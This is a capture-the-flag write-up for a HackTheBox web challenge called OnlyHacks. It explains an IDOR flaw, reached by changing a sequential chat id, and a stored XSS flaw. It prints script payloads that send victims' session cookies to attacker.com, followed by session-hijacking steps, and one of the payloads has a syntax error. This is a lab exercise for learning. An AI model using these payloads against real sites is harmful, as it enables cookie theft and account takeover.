HTB-CTF {OnlyHacks}
CHALLENGE DESCRIPTION
Dating and matching can be exciting, especially during Valentine's, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?
Challenge Information
Category: Web
Difficulty: Very Easy
Objective: Exploit web vulnerabilities to retrieve the flag.
Tag : IDOR , XSS
Identifying Functionality
Upon accessing the OnlyHacks website, the following functionalities were observed:
Login Page (/login) – Users can log in using their credentials.
Registration Page (/register) – New users can sign up.
Dashboard (/dashboard) – Displays user profiles for matching.
Match Page (/chat) – Shows matched users and chat functionality.
SOLUTION
IDOR
Vulnerability Analysis
The chat system was vulnerable to IDOR due to improper access control.
The chat endpoint used sequential numerical IDs, allowing an attacker to manipulate them.
By modifying the id parameter, retrieving another user's match details was possible, revealing the flag.
Exploitation Steps
Register and log in to the website.
Like all profiles which only have 4 users.
Navigate to the /chat page.
The requested URL was observed as:
https://IPHTB/chat/?id=6
Brute-force and get the 200 responses.
Change
id=6 to id=3
The response revealed the flag
Stored Cross-Site Scripting (XSS) – Chat Exploit
Vulnerability Analysis
The chat feature was vulnerable to Stored XSS, meaning malicious JavaScript was executed whenever another user viewed the chat.
This could be leveraged to steal session cookies and impersonate other users.
Exploitation Steps
Send testing payload in chat
For testing -- <h1>Hello</h1>
Send the following malicious XSS payload in chat.
<script>document.location="http://attacker.com/?cookie="+document.cookie</script>
<script>fetch(http://attacker.com/?cookie="+document.cookie)</script>
When Retana views the chat, the script executes, sending their session cookie to the attacker.
Replace our session cookie with the stolen one.
Reloading the page logs the attacker into Retana’s account.
Last updated